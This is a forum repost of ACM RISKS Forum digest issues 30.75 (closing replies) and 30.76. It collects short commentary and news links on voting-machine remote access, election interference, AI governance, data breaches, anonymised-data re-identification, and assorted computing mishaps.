    In evaluating diagnostic methods, several different sorts of RCTs
    can be contemplated. A trial might demonstrate that the new method
    (a) provided the same information as old methods, perhaps more
    quickly or at lower cost; or
    (b) provided new information that was of interest, but did not alter
    patient or physician behavior; or
    (c) provided new information that changed patient or physician behavior; or
    (d) changed patient-perceived outcome (feeling better or living longer).

    At the upper end of this scale (certainly (d), probably (c)), some of the
    patients in a given RCT will be winners, and some will be losers. Some
    people want to play this game, and some don't.

    Recruitment into RCTs is generally considered unethical.when the recruited
    patients are not fully at liberty to decline participation. This generally
    excludes prisoners and employees. Even when consent can be freely given
    (say, by an academic researcher experimenting on himself or herself*),
    trials in developed countries are subject to vetting by outside arbiters to
    be sure that the investigators are not, perhaps out of honest enthusiasm,
    inadvertently exposing subjects (even if the subjects are themselves) to
    unnecessary risks.

    Independent of the problem of obtaining freely-given consent from employees,
    there are potential problems of bias. As Stein notes, any such trial would
    need to be evaluated by non-conflicted reviewers. Similarly, patients with
    conflicts of interest** can lead to doubt about the soundness of a trial's
    results, depending on the credibility of the blinding, which is rarely
    perfect.

    * There is of course a long history of that, notably including the
    first cardiac catheterization.
    ** Wanting to be successfully treated is not a conflict of interest,
    but wanting one treatment or diagnostic process to work better than
    another might be.

    ------------------------------

    Date: 5 Jul 2018 22:05:17 -0400
    From: "John Levine" <jo...@iecc.com>
    Subject: Re: Google is training machines to predict when a patient will die
    (Stein and LA Times, R 30 74)

    I looked at the article you linked to, and I'm pretty sure that you sent the
    wrong link since there is nothing in the article even vaguely like *death
    panels*. It's about diagnosis based on a wider than usual range of patient
    data.

    The closest thing was a paragraph in which a hospital's system looked at
    very sick patient and estimated she had a 9% chance of dying during her
    stay, Google's AI thought it was 19% and she indeed died a few days later.
    That tells us she was sicker than she looked but nothing about whether her
    treatment was appropriate for her condition.

    On the other hand, we have a lot of work to do with or without machines to
    manage treatment of people who are terminally ill. Americans spend vast
    amounts on futile care in the last few weeks or days of life of people who
    will die no matter what we do. I expect that computers can be of some use
    figuring out what treatments might help and which are just painful and
    pointless.

    ------------------------------

    Date: Fri, 6 Jul 2018 14:11:49 +0800
    From: Richard M Stein <rmste...@gmail.com>
    Subject: Re: Google is training machines to predict when a patient will die
    (Levine, R 30 75)

    John -- Agreed about end of life healthcare expenditures; they are often
    onerous.

    My extrapolation of Medical Brain (MB) AI as a *death panel* proxy is
    premature, given state of readiness to deploy. I chose the label based on
    former Gov. Palin's campaign hyperbole to emphasize potential adoption and
    deployment of MB's predictive diagnostic capability. Clearly, connecting MB
    to a patient's IV infusion pump, respirator, or other life support device
    would be unwise and inhumane.

    When I read the LA Times piece, I imagined a hospital or hospice-bound
    patient with a `Do Not Resuscitate' (DNR) order tied to their health records
    under continuous MB monitoring near end of life (EOL).

    As a hypothetical, suppose MB EOL initiation was an opt-in choice? I asked
    myself, ``What MB outcome would trigger the live/die threshold: 50.1% or 22%
    or 90%?'' In light of MB diagnostic prediction, should DNRs have an extra
    field to specify an MB live/die outcome threshold that automates end of life
    sequence initiation - perhaps a morphine drip.

    A dystopian expectation, based on pure economic and business prerogatives,
    suggests that delegation of automated live/die choices will emerge. The
    nefarious intrusion of technology into life and death decisions promotes
    choice acceleration over deliberation; MB deployment demotes human sympathy
    to insignificance by pure computation. Some people might prefer a Magic
    8-ball to decide, not a stack of software toxicwaste.

    ------------------------------

    Date: 6 Jul 2018 11:45:18 -0400
    From: "John R. Levine" <jo...@iecc.com>
    Subject: Re: Google is training machines to predict when a patient will die
    (Stein, R 30 75)

    > My extrapolation of Medical Brain (MB) AI as a *death panel* proxy is
    > premature, given state of readiness to deploy.

    It's not premature, it's just silly. There is a great deal of work around
    the world looking at what treatment is cost-effective under what conditions.
    This is not exactly a new frontier of inquiry.

    One of the best-known is NICE, the National Institute for Health and Care
    Excellence in the UK. It is a major reason that even though the NHS spends
    less than half per person what we do in the US, and has well known funding
    and management problems, people in the UK are nonetheless about as healthy
    as in the US.

    NICE really is a death panel, and sometimes turns down treatments that might
    hypothetically extend someone's life, because the cost is too far out of
    line with the potential benefit. I'd rather a death panel run transparently
    with a goal of improving the country's health to ones we have in the US, run
    in secret with a goal of maximizing my insurance company's dividends.

    http://www.nice.org.uk/

    obRisks: shiny new technical things can be very distracting

    ------------------------------

    Date: Tue, 5 May 2018 11:11:11 -0800
    From: RISKS-...@csl.sri.com
    Subject: Abridged info on RISKS (comp.risks)

    The ACM RISKS Forum is a MODERATED digest. Its Usenet manifestation is
    comp.risks, the feed for which is donated by panix.com as of June 2011.
    => SUBSCRIPTIONS: The mailman Web interface can be used directly to
    subscribe and unsubscribe:
    http://mls.csl.sri.com/mailman/listinfo/risks

    => SUBMISSIONS: to ri...@CSL.sri.com with meaningful SUBJECT: line that
    includes the string `notsp'. Otherwise your message may not be read.
    *** This attention-string has never changed, but might if spammers use it.
    => SPAM challenge-responses will not be honored. Instead, use an alternative
    address from which you never send mail where the address becomes public!
    => The complete INFO file (submissions, default disclaimers, archive sites,
    copyright policy, etc.) is online.
    <http://www.CSL.sri.com/risksinfo.html>
    *** Contributors are assumed to have read the full info file for guidelines!

    => OFFICIAL ARCHIVES: http://www.risks.org takes you to Lindsay Marshall's
    searchable html archive at newcastle:
    http://catless.ncl.ac.uk/Risks/VL.IS --> VoLume, ISsue.
    Also, ftp://ftp.sri.com/risks for the current volume
    or ftp://ftp.sri.com/VL/risks-VL.IS for previous VoLume
    If none of those work for you, the most recent issue is always at
    http://www.csl.sri.com/users/risko/risks.txt, and index at /risks-30.00
    Lindsay has also added to the Newcastle catless site a palmtop version
    of the most recent RISKS issue and a WAP version that works for many but
    not all telephones: http://catless.ncl.ac.uk/w/r
    ALTERNATIVE ARCHIVES: http://seclists.org/risks/ (only since mid-2001)
    <http://the.wiretapped.net/security/info/textfiles/risks-digest/>
    *** NOTE: If a cited URL fails, we do not try to update them. Try
    browsing on the keywords in the subject line or cited article leads.
    Apologies for what Office365 and SafeLinks have done to URLs. I have
    tried to extract the essence.
    ==> Special Offer to Join ACM for readers of the ACM RISKS Forum:
    <http://www.acm.org/joinacm1>

    ------------------------------

    End of RISKS-FORUM Digest 30.75
    ************************
     
  11. LakeGator

    LakeGator Mostly Harmless Moderator VIP Member

    4,755
    483
    283
    Apr 3, 2007
    Tampa
    RISKS List Owner

    Jul 20, 2018 7:06 PM

    Posted in group: comp.risks

    RISKS-LIST: Risks-Forum Digest Friday 20 July 2018 Volume 30 : Issue 76

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
    Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

    ***** See last item for further information, disclaimers, caveats, etc. *****
    This issue is archived at <The Risks Digest> as
    <The Risks Digest>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    Top Voting Machine Vendor Admits It Installed Remote-Access Software
    on Systems Sold to States (Kim Zetter)
    Rosenstein reveals how the Justice Department is fighting attacks
    on US elections (CNBC)
    How the Russians hacked the DNC and passed its emails to WikiLeaks (WashPo)
    Russia exploited Twitter for disinformation as early as 2014,
    targeting local news (Boingboing)
    We've unleashed AI. Now we need a treaty to control it. (latimes.com)
    AI Innovators Take Pledge Against Autonomous Killer Weapons (npr.org)
    The cameras that know if you're happy - or a threat (bbc.com)
    Millions of Verizon customer records exposed in security lapse (ZDNet)
    Ticketmaster breach was part of a larger credit card skimming
    effort, analysis shows (ZDNet)
    Doctors, hospitals sue patients posting negative online comments (USA Today)
    Facial Recognition Shows Promise for Data Center Security (EWeek)
    Shutting down an entire ATM network (JapanTimes)
    Some food stamp recipients may soon lose access to farmers market benefits
    (WashPo)
    Tesla Powerwall2 home battery hacking? (Henry Baker)
    China Expands Surveillance of Sewage to Police Illegal Drug Use
    (Scientific American)
    Hunting the Con Queen of Hollywood (Hollywood Reporter)
    Micro SD cards silently switching to read-only when they're "too old"
    (Benoit Goas)
    Birds are making expensive roaming calls (The Register)
    Robo-calls are getting worse. And some big businesses soon could
    start calling you even more. (WashPo)
    Smart Mouthguard Senses Muscle Fatigue (Scientific American)
    Risks on a Friday the 13th ... (Rob Slade)
    We're not allowed to die anymore (NYTimes)
    'Data is a fingerprint': why you aren't as anonymous as you think
    online (Olivia Stein)
    Re: FACEPTION (Rob Slade)
    Re: Employees as subjects in clinical trials (Dmitiri Maziuk)
    Re: Video: Gavin Williamson hilariously interrupted by Siri (Amos Shapir)
    Sami Saydjari: Engineering Trustworthy Systems (PGN)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Tue, 17 Jul 2018 06:46:32 -1000
    From: geoff goodfellow <ge...@iconia.com>
    Subject: Top Voting Machine Vendor Admits It Installed Remote-Access Software
    on Systems Sold to States (Kim Zetter)

    Kim Zetter, Motherboard
    Remote-access software and modems on election equipment 'is the worst
    decision for security short of leaving ballot boxes on a Moscow street
    corner.'

    Election Systems and Software, ``the nation's top voting machine maker has
    admitted in a letter to a federal lawmaker that the company installed
    remote-access software on election-management systems it sold over a period
    of six years, raising questions about the security of those systems and the
    integrity of elections that were conducted with them...''

    In a letter sent to Sen. Ron Wyden (D-OR) in April and obtained recently by
    Motherboard, Election Systems and Software acknowledged that it had
    ``provided pcAnywhere remote connection software ... to a small number of
    customers between 2000 and 2006'' which was installed on the
    election-management system ES&S sold them.

    The statement contradicts what the company told me and fact checkers for a
    story I wrote for *The New York Times* in February. At that time, a
    spokesperson said ES&S had never installed pcAnywhere on any election system
    it sold. ``None of the employees, ... including long-tenured employees, has
    any knowledge that our voting systems have ever been sold with remote-access
    software,'' the spokesperson said. [KZ]

    Top Voting Machine Vendor Admits It Installed Remote-Access Software on Systems Sold to States

    [Kim Zetter has been superb in her long-time reporting on election
    integrity -- and the lack thereof -- and many other RISKS-related topics.
    Her article is extremely timely, and just one more serious warning of the
    potential risks. PGN]

    ------------------------------

    Date: Fri, 20 Jul 2018 12:01:46 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Rosenstein reveals how the Justice Department is fighting attacks
    on US elections (CNBC)

    The document highlights the increasing critical role that private-sector
    companies are playing in national security matters.

    CNBC US Home%2F2018%2F07%2F20%2Fhow-the-justice-department-is-fighting-election-threats-cybercrime.html

    ------------------------------

    Date: Sat, 14 Jul 2018 20:02:29 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: How the Russians hacked the DNC and passed its emails to WikiLeaks
    (WashPo)

    The special counsel's indictment of 12 Russian intelligence officers is a
    technical guide to the Kremlin's 2016 operation.

    How the Russians hacked the DNC and passed its emails to WikiLeaks

    ------------------------------

    Date: Thu, 12 Jul 2018 12:08:38 -0700
    From: Lauren Weinstein <lau...@vortex.com>
    Subject: Russia exploited Twitter for disinformation as early as 2014,
    targeting local news (Boingboing)

    via NNSquad
    Russia exploited Twitter for disinformation as early as 2014, targeting local news

    As early as 2014, Russian operatives working out of the Internet Research
    Agency (IRC) in St. Petersburg were busy creating fake Twitter accounts
    for U.S. local news organizations that did not exist.

    ------------------------------

    Date: Tue, 17 Jul 2018 12:28:21 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: We've unleashed AI. Now we need a treaty to control it.
    (latimes.com)

    We've unleashed AI. Now we need a treaty to control it

    "The treaty would enshrine certain basic principles. The concept of
    "human-in-command" to guarantee that people retain control over AI should
    be a priority. Standards would be set for monitoring AI
    systems. Fundamental human rights should be specifically protected. A new
    international body should be created for oversight, similar to the
    International Atomic Energy Agency.

    "The obstacles are apparent, from rogue nations and monopoly-minded
    companies to the sorry state of international cooperation. But advances in
    AI and machine learning are moving so fast that today seems like
    yesterday, making the challenge urgent."

    Daniel H. Wilson, the author of "How to Survive a Robot Uprising" is a good
    candidate to lead treaty negotiations.

    Certain nations do not respect existing treaties governing human rights,
    WMDs, or even climate change accelerants. What possible incentives will
    motivate treaty compliance and membership in a hypothesized IAAIR -- the
    International Agency for Artificial Intelligence and Robotics?

    ------------------------------

    Date: Thu, 19 Jul 2018 15:33:47 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: AI Innovators Take Pledge Against Autonomous Killer Weapons (npr.org)

    AI Innovators Take Pledge Against Autonomous Killer Weapons

    "... we the undersigned agree that the decision to take a human life
    should never be delegated to a machine," the pledge says. It goes on to
    say, "... we will neither participate in nor support the development,
    manufacture, trade, or use of lethal autonomous weapons."

    Compare with the IEEE Code of Ethics, Article 1 (see
    IEEE Code of Ethics

    "to hold paramount the safety, health, and welfare of the public, to
    strive to comply with ethical design and sustainable development
    practices, and to disclose promptly factors that might endanger the public
    or the environment;"

    The ACM articles (see The ACM Code of Ethics arose from the experiences, values and aspirations of computing professionals around the world, and captures the conscience of the profession. It affirms an obligation of computing professionals to use their skills for the benefit of society.)
    express similar intent.

    This pledge, while sincere and honorable, ignores long-established
    professional ethics and practices. Creativity's thrill apparently infected
    our colleagues' judgment, inducing myopia and amnesia toward these legacy
    guiding principles. Perhaps research grants were too enticing to refuse
    without risking university tenure or employment promotion opportunity?

    Open-source neural networks and artificial life training platforms enable
    even the smallest nation to initiate an autonomous killer program. These
    weapons will likely populate the next battlefield; the "human-in-control"
    probably faraway from the conflict zone. I doubt "Real Steel" engagement
    will become an effective tactic during a swarm intelligence battle.

    This leads to the question of how to possibly sterilize a battlefield
    deployment of AI-driven killers. A micro-EMP (preferably non-nuclear) might
    do it. A cluster-bomb of radar-guided or passive-metal-seeking ultra-tazers?

    ------------------------------

    Date: Thu, 19 Jul 2018 15:14:27 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: The cameras that know if you're happy - or a threat (bbc.com)

    The cameras that know if you're happy - or a threat

    This technology motivates the old aphorism to "Keep smiling, the boss likes
    idiots." I wonder if employers will institute a "smile or frown" score as
    part of performance reviews?

    ------------------------------

    Date: Sun, 15 Jul 2018 00:51:30 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Millions of Verizon customer records exposed in security lapse
    (ZDNet)

    Customer records for at least 14 million subscribers, including phone
    numbers and account PINs, were exposed.

    https://www.zdnet.com/article/millions-verizon-customer-records-israeli-data/

    ------------------------------

    Date: Sat, 14 Jul 2018 18:57:13 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Ticketmaster breach was part of a larger credit card skimming
    effort, analysis shows (ZDNet)

    https://www.zdnet.com/article/ticke...r-credit-card-skimming-effort-analysis-shows/

    ------------------------------

    Date: Wed, 18 Jul 2018 09:50:32 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Doctors, hospitals sue patients posting negative online comments
    (USA Today)

    http://www.usatoday.com/story/news/...s-posting-negative-online-comments/763981002/

    ------------------------------

    Date: Sat, 14 Jul 2018 11:03:19 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Facial Recognition Shows Promise for Data Center Security
    (EWeek)

    While Ramos' trial is still months away, the successful use of computer
    technology to confirm a murder suspect's identity made it clear that facial
    recognition systems have reached the point where they can perform reliably
    enough to identify a random person fairly reliability.

    http://www.eweek.com/security/facial-recognition-shows-promise-as-next-step-in-corporate-security

    "Fairly reliably" -- new horizons in mistaken identity? New questions needed
    for defense lawyers to cross-examine facial recognition systems?

    ------------------------------

    Date: Mon, 16 Jul 2018 19:08:58 +0900
    From: Rodney Van Meter <r...@sfc.wide.ad.jp>
    Subject: Shutting down an entire ATM network (JapanTimes)

    Mizuho Bank is one of the largest banks in Japan. Today (Monday, Japan time)
    is the last day of a three-day weekend. Mizuho decided to shut down *its
    entire ATM network* from midnight Friday night until 8a.m. Tuesday, so they
    could perform a flag day (maybe even forklift? not sure) upgrade on ATM
    software. Apparently, it's not just their own ATMs, but any 7-11 or other
    ATMs that would also normally give you access to your account cannot; it's a
    backend upgrade as well as frontend.

    Short blurb in English:
    http://www.japantimes.co.jp/news/20...three-day-weekend/#.W0xs8tgzbOQ40c4d5e9075|1D

    Short article in Japanese:
    http://headlines.yahoo.co.jp/hl?a=20180714-00010006-bfj-bus_all

    *Mizuho nammin*, or *Mizuho refugees*
    https://twitter.com/hashtag/%E3%81%...d5eb04283b|40779d3379c44626b8bf140c4d5e9075|1

    I'm sure the risks of this are pretty obvious to readers here. Suffice it
    to say, their 24 million customers aren't happy.

    ------------------------------

    Date: Sun, 15 Jul 2018 15:00:58 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Some food stamp recipients may soon lose access to farmers market
    benefits (WashPo)

    The Washington Post

    Josh Wiles, Novo Dia's founder and president, cited several reasons for the
    company's shutdown. The marketplace for SNAP transactions is highly
    regulated and requires extra (read: expensive) security measures beyond what
    is required for credit cards or debit cards. The profits are small because
    markets and individual farmers process micro-payments, often as little as a
    few dollars.

    The *tipping point*, though, Wiles said, was the decision by the new
    administrator of the SNAP equipment program to work with electronic-payment
    giant First Data, rather than Novo Dia and its Mobile Market app.

    Without continuing to gain new customers and economies of scale, Wiles said,
    Novo Dia could not remain financially viable: ``Once it became clear that we
    were not going to be part of it, we knew we would not be able to scale in a
    manner that allowed us to be profitable or even sustainable.''

    https://www.washingtonpost.com/life...fb2caa-838d-11e8-8f6c-46cb43e3f306_story.html

    ------------------------------

    Date: Tue, 17 Jul 2018 14:47:07 -0700
    From: Henry Baker <hba...@pipeline.com>
    Subject: Tesla Powerwall2 home battery hacking?

    I'm not the only one who's noticed that the Tesla "Powerwall2" home battery
    system uses the same ubiquitous "CAN bus" found in automobiles. (Duh! It
    appears that the Powerwall2 is basically 1/4 of a standard base Tesla Model
    3 battery.) Many home battery systems utilize several Powerwall2's, and
    hence approximate 1/4-3/4 of the energy storage capacity of a Tesla base
    Model 3.

    After a number of notorious car hacks using this same CAN bus over the past
    several years, what could possibly go wrong with a Powerwall2 system --
    having the equivalent of several gallons of gasoline stored within its
    batteries -- in/on your home?

    Furthermore, the Powerwall2 is connected to the Internet through your home
    router, so that the Tesla cellphone app can talk to Tesla and hence to your
    Powerwall2.

    Now Tesla has apparently put in a lot of effort into securing the
    communications of its *autos*, but I wonder if this same level of effort has
    been invested in the security of the Powerwall2?

    Unlike the Tesla automobile, which is connected only sporadically with the
    Internet, your home Powerwall2 is presumably capable of being attacked 24x7.

    It's also possible that a standard auto OBD-II connector could be installed
    by a hacker directly on the Powerwall2 -- after all, many Powerwall2 systems
    are mounted *outside the house*. With an OBD-II and Bluetooth/Wifi, hacking
    could then be done discretely from a nearby vehicle, and would completely
    bypass any security built into the Powerwall2's own wifi connection.

    Click once to turn off the refrigerator; click twice to *halt and catch
    fire*.

    ------------------------------

    Date: Tue, 17 Jul 2018 12:32:19 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: China Expands Surveillance of Sewage to Police Illegal Drug Use
    (Scientific American)

    https://www.scientificamerican.com/...illance-of-sewage-to-police-illegal-drug-use/

    April Fools for 2019: The PRC expands surveillance to detect halitosis and BO.

    ------------------------------

    Date: Fri, 13 Jul 2018 22:52:16 -0400
    From: Gabe Goldberg <ga...@gabegold.com>
    Subject: Hunting the Con Queen of Hollywood (Hollywood Reporter)

    For more than a year, some of the most powerful women in entertainment --
    including Amy Pascal, Kathleen Kennedy, Stacey Snider and a 'Homeland'
    director -- have been impersonated by a cunning thief who targets insiders
    with promises of work, then bilks them out of thousands of dollars. The
    Hollywood Reporter has obtained exclusive audio recordings of the savvy
    imposter as victims come forward and a global investigation heats up. ...

    For a long time, Linka Glatter thought she was alone in being faked. She
    tried to contact the police and the FBI, but neither showed interest. The
    amount of money involved was too small, they told her. She hired a private
    investigator, who discovered that the scammers were using burner phones to
    cover their tracks and GoDaddy accounts for fake email addresses. She
    contacted corporate security at a major Hollywood studio, but that didn't
    help either. The calls kept coming. One day, a well-known political
    consultant in Washington got in touch.

    http://www.hollywoodreporter.com/features/hunting-con-queen-hollywood-1125932

    ------------------------------

    Date: Mon, 16 Jul 2018 23:38:44 +0200
    From: Benoit Goas <goa...@hawk.iit.edu>
    Subject: Micro SD cards silently switching to read-only when they're "too old"

    The 64G Patriot micro SD I had been using in my cell phone from mid 2014
    just decided to turn itself into a read-only memory card. From what I read,
    it most likely reached its maximum number of uses, as it happens at least
    with some Samsung cards too. It would be to protect the card from losing
    all its data, after its cells were erased "too many times" (limit number
    depending on the card, and appearing to be in the order of 10-100k). And
    according to Internet forums, and card reviews on Amazon, it looks like it's
    getting more and more common!

    A very bad point is that there were no error messages at all. I added music
    files before a trip, but I had none of the new files available later so at
    first I thought I didn't do it correctly (even if the transfer was fine, it
    could for example have been to my card backup on an hard drive instead of
    going to the actual card). Then, despite the pictures still being taken
    correctly by my phone (browsing was OK, able to delete the bad ones...), I
    lost all of the new ones when my phone rebooted. So they were only in a
    cache memory somewhere, but nowhere on the SD card (not found by deep
    recovery tools either). More fun, the older ones I deleted came back during
    the same reboot...

    I understand it would be bothering to have an error message at each card
    access, but at least I would have known to change the card and would not
    have lost 3 days of pictures! So beware...

    ------------------------------

    Date: Mon, 16 Jul 2018 23:36:43 +0200
    From: Benoit Goas <goa...@hawk.iit.edu>
    Subject: Birds are making expensive roaming calls (The Register)

    A new risk when tracking birds (or any other kind of stuff): someone
    manage to recover the SIM card from the tracker, and used it!
    More detailed story at either
    https://www.theregister.co.uk/2018/07/03/stork_mobile_theft/
    or
    http://www.iflscience.com/plants-an...racks-up-2700-on-researchers-cell-phone-bill/

    ------------------------------

    Date: Fri, 13 Jul 2018 21:42:47 -0400
    From: Monty Solomon <mo...@roscom.com>
    Subject: Robo-calls are getting worse. And some big businesses soon could
    start calling you even more. (WashPo)

    Robocalls ravaged Americans' smartphones in record numbers last month. But
    some of the nation's top businesses are still urging the Trump
    administration to make it easier for them to dial and text mobile devices en
    masse.

    http://www.washingtonpost.com/techn...esses-soon-could-start-calling-you-even-more/

    ------------------------------

    Date: Fri, 13 Jul 2018 09:33:15 +0800
    From: Richard M Stein <rms...@ieee.org>
    Subject: Smart Mouthguard Senses Muscle Fatigue (Scientific American)

    http://www.scientificamerican.com/podcast/episode/smart-mouthguard-senses-muscle-fatigue/

    "The mouth guard's batteries are rechargeable wirelessly, and the device
    can use low-power Bluetooth to send information to smartphones, watches
    and other electronic devices."

    Athlete bio-surveillance provides clues about peak performance and
    degradation under physical stress. This telemetry stream, if clear text
    and not subject to privacy management protection, can be exploited by
    gaming interests.

    ------------------------------

    Date: Fri, 13 Jul 2018 12:14:57 -0700
    From: Rob Slade <rms...@shaw.ca>
    Subject: Risks on a Friday the 13th ...

    Happy Friday the 13th to all you professional paranoiacs out there.

    I have previously mentioned some of the risks involved in living here.
    http://community.isc2.org/t5/Career/Risk-and-cost-benefit/m-p/12101

    In addition, the Lion's Gate Bridge is closed today, due to a "police
    incident." (That probably means a jumper.) This also means that the
    Ironworker's Memorial Second Narrows Bridge (and for risk fans I can
    recommend "Tragedy at Second Narrows," by Eric Jamieson) is completely
    clogged in both directions, while the Seabus has at least a two, and
    possibly as high as four, sailing wait.

    But that isn't the risk I wanted to talk about today.

    We have bears here.

    (When I was a young lad at university, back before there was an Internet, my
    residence had a fellow from Cambridge whose family, back in The Olde
    Country, were terrified that he would be eaten by a bear. So, whenever
    there were reports of bears in the north side communities, we helpfully cut
    out the stories for him to send back to his family.)

    Black bears are fairly cute, and not as vicious as grizzlys. But it is not
    a good idea to feed them. It's dangerous for people, and it's dangerous for
    the bears, too. (They get acclimated, and come to regard people as sources
    of food, and then there is trouble, and often the bears get shot.) So there
    are laws, here, prohibiting people from feeding bears.

    Some people do it anyway.

    http://vancouversun.com/news/local-...er-investigation-for-feeding-bears-from-house
    or
    http://is.gd/mq6okV

    Now, if you are going to break the law, it might be a good idea not to post
    videos of you doing so on your social media account ...

    ------------------------------

    From: Benoit Goas <goa...@hawk.iit.edu>
    Date: Mon, 16 Jul 2018 23:36:09 +0200
    Subject: We're not allowed to die anymore (NYTimes)

    We still get some crazy cases with digitized processes: PayPal Apologizes
    for Letter Demanding Payment From Woman Who Died of Cancer:
    https://www.nytimes.com/2018/07/11/business/paypal-dead-wife-husband-letter-nyt.html

    So many corner/special cases to think about!

    In the same kind of problems, a(n old) friend of mine died recently, and
    facebook want me to organize an event for his birthday later this month.
    But at least, despite the posts by his family on his page, I guess facebook
    doesn't know he's dead. Not like Paypal!

    ------------------------------

    Date: July 15, 2018 at 6:27:54 AM GMT+9
    From: Dewayne Hendricks <dew...@warpspeed.com>
    Subject: 'Data is a fingerprint': why you aren't as anonymous as you think
    online (Olivia Stein)

    Olivia Solon, *The Guardian*, 13 Jul 2018
    So-called *anonymous* data can be easily used to identify everything from
    our medical records to purchase histories

    http://www.theguardian.com/world/20...rowsing-data-medical-records-identity-privacy

    In August 2016, the Australian government released an `anonymised' data set
    comprising the medical billing records, including every prescription and
    surgery, of 2.9 million people.

    Names and other identifying features were removed from the records in an
    effort to protect individuals' privacy, but a research team from the
    University of Melbourne soon discovered that it was simple to re-identify
    people, and learn about their entire medical history without their consent,
    by comparing the dataset to other publicly available information, such as
    reports of celebrities having babies or athletes having surgeries.

    The government pulled the data from its website, but not before it had been
    downloaded 1,500 times.

    This privacy nightmare is one of many examples of seemingly innocuous,
    de-identified pieces of information being reverse-engineered to expose
    people's identities. And it's only getting worse as people spend more of
    their lives online, sprinkling digital breadcrumbs that can be traced back
    to them to violate their privacy in ways they never expected.

    Nameless New York taxi logs were compared with paparazzi shots at locations
    around the city to reveal that Bradley Cooper and Jessica Alba were bad
    tippers. In 2017 German researchers were able to identify people based on
    their `anonymous' web browsing patterns. This week University College London
    researchers showed how they could identify an individual Twitter user based
    on the metadata associated with their tweets, while the fitness tracking app
    Polar revealed the homes and in some cases names of soldiers and spies.

    ``It's convenient to pretend it's hard to re-identify people, but it's
    easy. The kinds of things we did are the kinds of things that any first-year
    data science student could do,'' said Vanessa Teague, one of the University
    of Melbourne researchers to reveal the flaws in the open health data.

    One of the earliest examples of this type of privacy violation occurred in
    1996 when the Massachusetts Group Insurance Commission released `anonymised'
    data showing the hospital visits of state employees. As with the Australian
    data, the state removed obvious identifiers like name, address and social
    security number. Then the governor, William Weld, assured the public that
    patients' privacy was protected.

    Latanya Sweeney, a computer science grad who later became the chief
    technology officer at the Federal Trade Commission, showed how wrong Weld
    was by finding his medical records in the data set. Sweeney used Weld's zip
    code and birth date, taken from voter rolls, and the knowledge that he had
    visited the hospital on a particular day after collapsing during a public
    ceremony, to track him down. She sent his medical records to his office.

    In later work, Sweeney showed that 87% of the population of the United
    States could be uniquely identified by their date of birth, gender and
    five-digit zip codes. ``The point is that data that may look anonymous is
    not necessarily anonymous,'' she said in testimony to a Department of
    Homeland Security privacy committee.

    More recently, Yves-Alexandre de Montjoye, a computational privacy
    researcher, showed how the vast majority of the population can be identified
    from the behavioural patterns revealed by location data from mobile
    phones. By analysing a mobile phone database of the approximate locations
    (based on the nearest cell tower) of 1.5 million people over 15 months (with
    no other identifying information) it was possible to uniquely identify 95%
    of the people with just four data points of places and times. About 50%
    could be identified from just two points.

    The four points could come from information that is publicly available,
    including a person's home address, work address and geo-tagged Twitter
    posts.

    ------------------------------

    Date: Sat, 14 Jul 2018 19:18:10 -0700
    From: Rob Slade <rms...@shaw.ca>
    Subject: Re: FACEPTION (Goldberg, RISKS-30.75)

    Oi.

    Creepy social engineering is one thing.
    https://community.isc2.org/t5/Indus...y-social-engineering-fraud-or-prank/m-p/12364 or https://is.gd/j5MNCT

    Basing law enforcement, physical security, investigations, and job
    interviews on highly questionable premises is quite another.

    Faception claims to be able to "reveal personality from facial images" and
    "dramatically improve public safety, communications, decision-making, and
    experiences." How? Well, after some buzzword filled marketing jargon about
    "first-to-technology and first-to-market with proprietary computer vision
    and machine learning technology" and mention of the magic word "biometrics,"
    if you persist you may be able to find the theory behind the technology. It
    seems to boil down to the following logic:

    1) DNA can determine (certain) personality traits (sometimes to a significant
    extent). (This is true, with the provisos I've put in parentheses.)
    2) DNA can determine how you look.

    THEREFORE:

    Your personality is determined by how you look.

    (Finding the flaws in this argument is left as an exercise for students of
    logic.)

    I am inescapably reminded of the "bomb detectors" sold to Afghani and Iraqi
    security forces that had no detection capabilities at all, and caused large
    numbers of deaths. That's on the false negative side. The potential damage
    caused on the false positive side are likely considerably greater ...

    Of course, there's always:

    > Date: Sat, 14 Jul 2018 08:46:31 -0700
    > From: "Peter G. Neumann" <neu...@csl.sri.com>
    > Subject: Regulation of facial-recognition software? (WashPo)

    ------------------------------

    Date: Sun, 15 Jul 2018 09:02:32 -0500
    From: Dmitri Maziuk <dma...@bmrb.wisc.edu>
    Subject: Re: Employees as subjects in clinical trials (Fenichel, RISKS-30.75)

    Last I heard El Al ground crews still fly the plane they serviced (always
    have), and they still are fully at liberty to seek gainful employment
    elsewhere. I'm not quite sure what makes med AI coders so different --
    though in all fairness I would draw the line at family members. I think El
    Al does.

    ------------------------------

    Date: Tue, 17 Jul 2018 00:44:04 +0300
    From: Amos Shapir <amo...@gmail.com>
    Subject: Re: Video: Gavin Williamson hilariously interrupted by Siri
    during statement to Parliament (RISKS-30.75)

    It seems that what had triggered Siri was the mention of "*a Syri*an
    democratic force". Conclusion: Don't bring Siri to a discussion about
    Syria...

    (And also be careful when talking about "*a Lexus*" or "*a court ana*lyzer")

    ------------------------------

    Date: Thu, 19 Jul 2018 9:55:35 PDT
    From: "Peter G. Neumann" <neu...@csl.sri.com>
    Subject: Sami Saydjari: Engineering Trustworthy Systems

    Here's a book that might be of interest to RISKS readers who are serious
    about developing systems that must be much more trustworthy. It is quite
    comprehensive, addressing many problems that have been discussed in RISKS.
    It may not be a complete answer on how to fully turn the attainment of
    trustworthy systems into a true engineering discipline, but it should be
    very helpful to anyone pursuing the creation of such a discipline -- which
    today does not seem to exist.

    O. Sami Saydjari
    Engineering Trustworthy Systems:
    Get Cybersecurity Design Right the First Time
    McGraw-Hill Education, 2018
    xlvii+540, $60.00
    ISBN 978-1-260-11817-9

